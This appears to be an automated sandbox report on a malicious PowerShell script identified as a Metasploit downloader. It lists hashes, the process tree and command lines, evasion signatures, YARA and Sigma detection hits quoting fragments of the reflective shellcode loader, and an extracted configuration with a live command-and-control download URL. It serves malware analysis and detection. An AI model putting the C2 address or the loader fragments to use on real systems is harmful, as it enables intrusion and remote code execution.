Play interactive tour

Edit tour

Windows Analysis Report a.ps1

Overview

General Information

Sample Name:	a.ps1
Analysis ID:	444594
MD5:	e79502a7f159ee2c72aa997e922559e3
SHA1:	12601ad19988ac4c58a245d151855439dc1a0382
SHA256:	90a17ac3595ed77f5f6cd307b3ffd2cf4c564aa05d132fdb37e7460d4081be70
Infos:
Most interesting Screenshot:

Detection

Metasploit

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Metasploit Payload

Yara detected MetasploitPayload

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Checks if the current process is being debugged

Contains functionality to detect virtual machines (SLDT)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7144 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\a.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5964 cmdline: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WerFault.exe (PID: 6244 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 900 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)\r\n", "Type": "Metasploit Download", "URL": "http://206.189.69.35/x1Fm"}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
a.ps1	SUSP_PS1_FromBase64String_Content_Indicator	Detects suspicious base64 encoded PowerShell expressions	Florian Roth	0x28:$: ::FromBase64String("H4s 0x28:$: ::FromBase64String("H4sIA

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x3b2:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x8ca:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x994:$s5: = [System.Convert]::FromBase64String( 0x626:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x814:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x9be:$substring: AAAAYInlM 0x9ba:$pattern2: /OiJAAAAYInlM
C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x34bc:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x39d4:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x3a9e:$s5: = [System.Convert]::FromBase64String( 0x3730:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x391e:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x3ac8:$substring: AAAAYInlM 0x3ac4:$pattern2: /OiJAAAAYInlM
00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000005.00000000.700532257.0000000004DFB000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000000.00000002.758206256.000001CDA068C000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x1037:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x15df:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x16cd:$s5: = [System.Convert]::FromBase64String( 0x12f3:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x151d:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x16f7:$substring: AAAAYInlM 0x16f3:$pattern2: /OiJAAAAYInlM
00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000000.00000002.772219590.000001CDB7F20000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000005.00000000.711757799.0000000004DFB000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x743:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x1deb:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x34ea:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xd0a7:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xceb:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x2393:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x3a92:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xd5bf:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xdd9:$s5: = [System.Convert]::FromBase64String( 0x2481:$s5: = [System.Convert]::FromBase64String( 0x3b80:$s5: = [System.Convert]::FromBase64String( 0xd689:$s5: = [System.Convert]::FromBase64String( 0x9ff:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x20a7:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x37a6:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0xd31b:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0xc29:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, 0x22d1:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, 0x39d0:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, 0xd509:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0xe03:$substring: AAAAYInlM 0x24ab:$substring: AAAAYInlM 0x3baa:$substring: AAAAYInlM 0xd6b3:$substring: AAAAYInlM 0xdff:$pattern2: /OiJAAAAYInlM 0x24a7:$pattern2: /OiJAAAAYInlM 0x3ba6:$pattern2: /OiJAAAAYInlM 0xd6af:$pattern2: /OiJAAAAYInlM
00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x743:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x1deb:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x34ea:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xd0a7:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xceb:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x2393:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x3a92:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xd5bf:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xdd9:$s5: = [System.Convert]::FromBase64String( 0x2481:$s5: = [System.Convert]::FromBase64String( 0x3b80:$s5: = [System.Convert]::FromBase64String( 0xd689:$s5: = [System.Convert]::FromBase64String( 0x9ff:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x20a7:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x37a6:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0xd31b:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0xc29:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, 0x22d1:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, 0x39d0:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, 0xd509:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0xe03:$substring: AAAAYInlM 0x24ab:$substring: AAAAYInlM 0x3baa:$substring: AAAAYInlM 0xd6b3:$substring: AAAAYInlM 0xdff:$pattern2: /OiJAAAAYInlM 0x24a7:$pattern2: /OiJAAAAYInlM 0x3ba6:$pattern2: /OiJAAAAYInlM 0xd6af:$pattern2: /OiJAAAAYInlM
00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000000.00000002.758338125.000001CDA06AB000.00000004.00000001.sdmp	SUSP_PS1_FromBase64String_Content_Indicator	Detects suspicious base64 encoded PowerShell expressions	Florian Roth	0x3384:$: ::FromBase64String("H4s 0x4c98:$: ::FromBase64String("H4s 0x3384:$: ::FromBase64String("H4sIA 0x4c98:$: ::FromBase64String("H4sIA
00000000.00000002.758338125.000001CDA06AB000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000000.00000002.758303422.000001CDA06A6000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000005.00000000.706990419.0000000008BB0000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.758377802.000001CDA06B5000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000000.00000002.758256296.000001CDA0693000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000000.00000002.772859194.000001CDB8350000.00000004.00000001.sdmp	SUSP_PS1_FromBase64String_Content_Indicator	Detects suspicious base64 encoded PowerShell expressions	Florian Roth	0x110:$: ::FromBase64String("H4s 0x1a34:$: ::FromBase64String("H4s 0x110:$: ::FromBase64String("H4sIA 0x1a34:$: ::FromBase64String("H4sIA
00000000.00000002.772859194.000001CDB8350000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp	SUSP_PS1_FromBase64String_Content_Indicator	Detects suspicious base64 encoded PowerShell expressions	Florian Roth	0xb454:$: ::FromBase64String("H4s 0xb454:$: ::FromBase64String("H4sIA
00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
Process Memory Space: powershell.exe PID: 7144	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x5b3b0:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xee07e:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xf6312:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x2c7d4b:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x2caa6a:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x2f1209:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x4f9959:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x55d394:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x55e720:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x55f4f2:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x562447:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x66f627:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x671033:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x671f90:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x67e799:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x5b8c8:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xee626:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xf682a:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x2c8263:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x2caf82:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x2f1721:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
Process Memory Space: powershell.exe PID: 7144	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x5b9bc:$substring: AAAAYInlM 0xee73e:$substring: AAAAYInlM 0xf691e:$substring: AAAAYInlM 0x2c8357:$substring: AAAAYInlM 0x2cb076:$substring: AAAAYInlM 0x2f1815:$substring: AAAAYInlM 0x4f9f65:$substring: AAAAYInlM 0x55d9a0:$substring: AAAAYInlM 0x55ed2c:$substring: AAAAYInlM 0x55fafe:$substring: AAAAYInlM 0x562a53:$substring: AAAAYInlM 0x66fc33:$substring: AAAAYInlM 0x67163f:$substring: AAAAYInlM 0x67259c:$substring: AAAAYInlM 0x67eda5:$substring: AAAAYInlM 0x5b9b8:$pattern2: /OiJAAAAYInlM 0xee73a:$pattern2: /OiJAAAAYInlM 0xf691a:$pattern2: /OiJAAAAYInlM 0x2c8353:$pattern2: /OiJAAAAYInlM 0x2cb072:$pattern2: /OiJAAAAYInlM 0x2f1811:$pattern2: /OiJAAAAYInlM
Process Memory Space: powershell.exe PID: 7144	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
Process Memory Space: powershell.exe PID: 5964	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x3efb6:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x3f95d:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x42111:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x423a2:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x5b898:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x5c81b:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x6ab96:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x6c137:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x74f2a:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x8344c:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xa32b1:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xa3c58:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xa640c:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xa669d:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xb9c37:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xbaa4d:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x1190a4:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x11a712:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x11bd80:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x11d3dc:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x11ea32:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
Process Memory Space: powershell.exe PID: 5964	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x3ff69:$substring: AAAAYInlM 0x5ce27:$substring: AAAAYInlM 0xa4264:$substring: AAAAYInlM 0x119764:$substring: AAAAYInlM 0x11add2:$substring: AAAAYInlM 0x11c440:$substring: AAAAYInlM 0x11da9c:$substring: AAAAYInlM 0x11f03e:$substring: AAAAYInlM 0x120ff9:$substring: AAAAYInlM 0x13fa23:$substring: AAAAYInlM 0x140739:$substring: AAAAYInlM 0x1419e6:$substring: AAAAYInlM 0x14a358:$substring: AAAAYInlM 0x14b9c6:$substring: AAAAYInlM 0x14d034:$substring: AAAAYInlM 0x14e690:$substring: AAAAYInlM 0x14fc32:$substring: AAAAYInlM 0x151bed:$substring: AAAAYInlM 0x170617:$substring: AAAAYInlM 0x17132d:$substring: AAAAYInlM 0x1725da:$substring: AAAAYInlM
Process Memory Space: powershell.exe PID: 5964	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
Click to see the 29 entries

Sigma Overview

System Summary:

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile, CommandLine: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile, CommandLine|base64offset|contains: W*', Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\a.ps1', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7144, ProcessCommandLine: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile, ProcessId: 5964

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: a.ps1

Avira: detected

Found malware configuration

Show sources

Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp

Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)\r\n", "Type": "Metasploit Download", "URL": "http://206.189.69.35/x1Fm"}

Multi AV Scanner detection for submitted file

Show sources

Source: a.ps1	Virustotal: Detection: 50%			Perma Link
Source: a.ps1	ReversingLabs: Detection: 55%

Source:	Binary string: System.Configuration.Install.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: anagement.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: System.Data.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: System.ni.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: umerics.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: System.Numerics.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbTR source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb! source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: .textn.pdb ` source: powershell.exe, 00000005.00000000.702935630.00000000077BB000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: gpapi.pdbG source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.DirectoryServices.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: anagement.pdb&& source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: onfiguration.Install.pdbLL source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: atl.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: MpOAV.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb\ source: WerFault.exe, 0000000D.00000003.738499813.00000000052BD000.00000004.00000001.sdmp
